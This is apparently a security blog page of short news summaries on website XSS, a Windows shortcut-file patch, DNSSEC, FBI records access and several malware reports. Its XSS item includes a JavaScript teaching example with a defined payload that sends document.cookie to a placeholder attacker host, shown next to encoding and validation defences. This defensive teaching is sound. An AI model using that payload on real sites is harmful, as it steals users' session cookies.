The Security Pub

Random Thoughts About Security

Organizations Fail against XSS Attacks

“More websites are vulnerable to hackers than a year ago, with security now a concern across all sectors.”

According to a report from IT testing company NTA Monitor, 7% of sites fall under the high-risk security category, compared to 5% in 2009.

Technology director at NTA Roy Hills said that companies are failing to address security weaknesses when they arise. “It is important that organizations remember that testing their sites will only indicate where they are deficient and they need to take action as soon as they are made aware of the problems,” he said.

NTA Monitor found that cross-site scripting (XSS) vulnerabilities were still a problem for many websites. With the introduction of Web 2.0, applications accept far more user input to enhance the user experience. Without proper input validation and, above all, context-aware output encoding at every point where that input is written back into a page, each new input field is another place an attacker can inject script.
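To make the point concrete, here is an added example (not from the NTA Monitor report or the Computer Weekly article) of the same untrusted value rendered with and without output encoding, plus the separate encoder an inline script sink needs. The greeting widget, the display-name rule and the attacker payload are all constructed for illustration; the `attacker.example` host is a placeholder.

```javascript
// Added example: reflected XSS in a greeting widget, vulnerable vs. hardened.
// Everything below (widget, names, payload, attacker host) is constructed for
// illustration and is not code from the article or the report.

// Constructed attacker payload: a "display name" that carries an event handler.
const ATTACKER_NAME =
  '<img src=x onerror="new Image().src=\'https://attacker.example/c?\'+document.cookie">';

// 1. Vulnerable rendering: user input concatenated straight into the HTML body.
//    The browser parses the <img> tag and runs the onerror handler.
function renderUnsafe(displayName) {
  return `<p>Welcome back, ${displayName}!</p>`;
}

// 2. Output encoding for the HTML body / quoted-attribute context.
//    Every character that can open or close markup becomes an entity, so the
//    browser shows the payload as text instead of parsing it.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderSafe(displayName) {
  return `<p>Welcome back, ${escapeHtml(displayName)}!</p>`;
}

// 3. A different sink needs a different encoder: a value dropped into an inline
//    <script> block must be a JS string literal, and a literal "</script>" inside
//    it would still end the block, so '<' is written as \u003c after JSON encoding.
function toScriptLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// 4. Input validation on top: an allowlist for what a display name may contain.
//    Validation narrows the attack surface; encoding at each sink is what stops XSS.
function isValidDisplayName(value) {
  return typeof value === 'string' && /^[\p{L}\p{N} ._-]{1,40}$/u.test(value);
}

// 5. Cheap self-check for a template expected to emit exactly one <p>...</p>:
//    any other tag, or an on*= handler inside a tag, means input reached the
//    HTML parser as markup rather than as text.
function hasInjectedMarkup(html) {
  const tags = html.match(/<\/?[a-z][^>]*>/gi) || [];
  return tags.some((t) => !/^<\/?p>$/i.test(t) || /\son\w+\s*=/i.test(t));
}

// Demo when run directly: node xss_encoding.js
if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe :', renderUnsafe(ATTACKER_NAME));
  console.log('safe   :', renderSafe(ATTACKER_NAME));
  console.log('script :', toScriptLiteral('</script><script>alert(1)</script>'));
  console.log('valid? :', isValidDisplayName(ATTACKER_NAME));
}
```

The two encoders are the point: `escapeHtml` is correct for text between tags and inside quoted attributes, but useless inside a `<script>` block or a URL, which is why "sanitize on input" alone keeps failing in the kind of sites the report describes.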

Other factors, such as an unresponsive third-party supplier that owns the underlying code, can also contribute to the prevalence of the issue, NTA Monitor said.

The public sector was identified as most high-risk, with the average number of vulnerabilities almost double those in 2009. The report added that government security breaches are likely to increase due to the impact of impending spending cuts. Manufacturing, legal services and IT & telecoms were also found to have websites among the most vulnerable to hackers.

This story was first published by Computer Weekly

Another Emergency Patch from Microsoft

Warning of an uptick in attacks, Microsoft plans to issue an emergency update to patch a critical Windows vulnerability that hackers are exploiting to seize control of PCs.

The patch, which fixes the way Windows parses the icons of shortcut (.lnk) files, will be released on Monday at around 10 a.m. California time. It comes two weeks after reports surfaced that unknown hackers were exploiting the flaw in an attempt to install malware on systems that control the operations of power plants and other critical infrastructure. At least two customers of SCADA, or supervisory control and data acquisition, software offered by Siemens have been hit by a computer worm that exploits the bug.

Check out the article – [The Register]

DNSSEC is Now Updated

BLACK HAT USA — Las Vegas — Two years after a major flaw was exposed in the Internet’s Domain Name System (DNS), a major upgrade to the infrastructure protocol that fixes that weakness is now up and running in all of the Internet root servers.

DNSSEC, which has been in the works for nearly two decades, was fully deployed in the root this month, the last step needed before deployment of the security protocol could officially get off the ground. DNSSEC is considered the key to preventing attacks that exploit the now-infamous cache-poisoning vulnerability revealed at Black Hat USA in 2008. Signing the root is only the trust anchor, though: a response is protected only where the chain of signatures from the root through the TLD down to the queried zone is complete and the resolver actually validates it.

Check out the article – [DarkReading]

FBI May Get Easier Access To Internet Activity

The Obama administration is seeking to make it easier for the FBI to compel companies to turn over records of an individual’s Internet activity without a court order if agents deem the information relevant to a terrorism or intelligence investigation.

The administration wants to add just four words — "electronic communication transactional records" — to a list of items that the law says the FBI may demand without a judge’s approval. Government lawyers say this category of information includes the addresses to which an Internet user sends e-mail; the times and dates e-mail was sent and received; and possibly a user’s browser history. It does not include, the lawyers hasten to point out, the "content" of e-mail or other Internet communication.

Check out the article – [The Washington Post]

Android Application Steals Data

A seemingly innocuous Android app that let users change their phone’s wallpaper has actually been stealing private user information and may have been downloaded millions of times. Mobile security firm Lookout unearthed the truth behind the deceitful app and presented its findings at the Black Hat security technology conference in Las Vegas, as reported by Venture Beat.

Check out the article – [TG Daily]

Facebook 'hack' releases 100 million user details onto file sharing sites

The data file, which was seeded onto BitTorrent file sharing services earlier this week by Ron Bowes, a security consultant, is around 2.8 gigabytes in size and contains the public Facebook profiles of 100 million users of the social networking site, around 20% of Facebook’s global membership. Facebook says that the data the Nmap security researcher collected is in the public domain and that no privacy rules have been breached.

Check out the article – [InfoSecurity]

Trojan masquerades as iPhone jailbreaking software

An email campaign targeting iPhone users who might want to jailbreak their device has been detected by BitDefender. Only a couple of days after U.S. federal regulators decided and announced that the practice wasn’t illegal, cybercriminals seized the opportunity to infect more systems, and the following email started hitting inboxes all over the world.

Check out the article – [Help Net Security]